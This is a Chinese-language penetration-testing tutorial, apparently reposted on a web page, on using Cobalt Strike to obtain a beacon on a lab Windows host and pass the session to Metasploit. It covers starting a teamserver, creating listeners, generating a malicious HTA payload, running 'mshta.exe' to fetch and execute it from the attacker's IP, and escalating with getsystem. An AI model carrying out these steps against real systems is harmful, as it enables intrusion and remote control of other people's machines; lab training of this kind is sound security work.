您好,登錄后才能下訂單哦!
這篇文章主要介紹如何使用cobaltstrike接口傳遞msf中的shell,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!
Cobalt Strike 一款以Metasploit為基礎(chǔ)的GUI框架式滲透測試工具,集成了端口轉(zhuǎn)發(fā)、服務(wù)掃描,自動(dòng)化溢出,多模式端口監(jiān)聽,exe、powershell木馬生成等。功能挺多,文章只是講了工具的核心功能
滲透機(jī):kali,靶機(jī):ws08。
kali:172.16.1.34
ws08:172.16.1.24
agscript 拓展應(yīng)用的腳本
clint 檢查profile的錯(cuò)誤信息
teamserver 服務(wù)端程序
cobaltstrike 客戶端程序
cobaltstrike.jar(java跨平臺(tái))客戶端
logs 目錄記錄與目標(biāo)主機(jī)的信息
third-party 第三方工具
啟動(dòng)服務(wù)器
執(zhí)行./teamserver 172.16.1.34 p@ssw0rd
不要關(guān)閉窗口,然后本機(jī)啟動(dòng)cobalt strike連接測試客戶端連接
枚舉用戶
用戶通信
/msg Ro0t xxxxxx
上面是啟動(dòng)和操作方法,下面看下cobaltstrike監(jiān)聽模塊
Beacon為cs內(nèi)置監(jiān)聽器,需要在目標(biāo)機(jī)上執(zhí)行相應(yīng)的payload,獲取shell到cs中。包含了smb,DNS, HTTP等模塊
=============================================================
windows/beacon_http/reverse_dns_txt
windows/beacon_http/reverse_http x86/x64
模塊有很多,這里不列舉了
foreigh為與外部相結(jié)合的監(jiān)聽器,主要用于msf結(jié)合,比如獲取meterpreter到shell中
=============================================================
在cobalt strike中添加一個(gè)Listener,創(chuàng)建beacon Listener
創(chuàng)建Foreign Listener
save,在主配置菜單中依次點(diǎn)擊,Attack,packages,HTML Application
選擇Listener生成與方法,有powershell,vba以及exe三種可執(zhí)行文件
選擇ps,保存到桌面上、
依次點(diǎn)擊Attacks,webdirve-by,hostfile、通過web服務(wù)打開連接通道
然后再彈出的窗口中找到文件一欄,點(diǎn)擊文件夾按鈕,找到需要添加的惡意腳本.hta、添加完后點(diǎn)擊launch啟動(dòng)web服務(wù)模塊
此時(shí)我們查看日志信息提示我們在靶機(jī)客戶端訪問連鏈接
回到靶機(jī),打開終端使用命令mshta.exe http://172.16.1.34:80/download/file.txt命令
kali查看,新連接已經(jīng)建立起來了
默認(rèn)情況下此處鏈接有60s的心跳線,為避免流量過大可以適當(dāng)調(diào)整間隔。
右擊會(huì)話選擇interact打開交互會(huì)話終端
可以查看下當(dāng)前權(quán)限,可以使用getsystem提權(quán)試試。
打開一個(gè)新的終端,進(jìn)入msf設(shè)置一個(gè)監(jiān)聽載荷,lhost設(shè)置成本地ip,然后expliit -j
回到cobalt里,右擊spawn生成新的listener。然后在彈出的窗口中點(diǎn)擊add添加一個(gè)新監(jiān)聽器
此時(shí)監(jiān)聽設(shè)置完,然后進(jìn)入msf終端來傳遞cobaltstrike的shell
回到msf可以發(fā)現(xiàn)已經(jīng)和靶機(jī)建立起了會(huì)話
以上是“如何使用cobaltstrike接口傳遞msf中的shell”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。